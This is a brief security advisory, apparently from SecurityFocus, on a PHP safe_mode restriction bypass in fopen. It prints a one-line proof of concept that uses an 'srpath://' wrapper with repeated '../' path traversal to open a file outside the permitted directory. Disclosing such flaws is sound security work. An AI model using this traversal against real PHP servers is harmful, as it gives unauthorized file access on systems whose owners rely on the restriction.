PHP FOpen Safe_Mode Restriction-Bypass Vulnerability

Attackers may exploit this issue with standard PHP code.

The following function call demonstrates this issue:

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'


 

Privacy Statement
Copyright 2010, SecurityFocus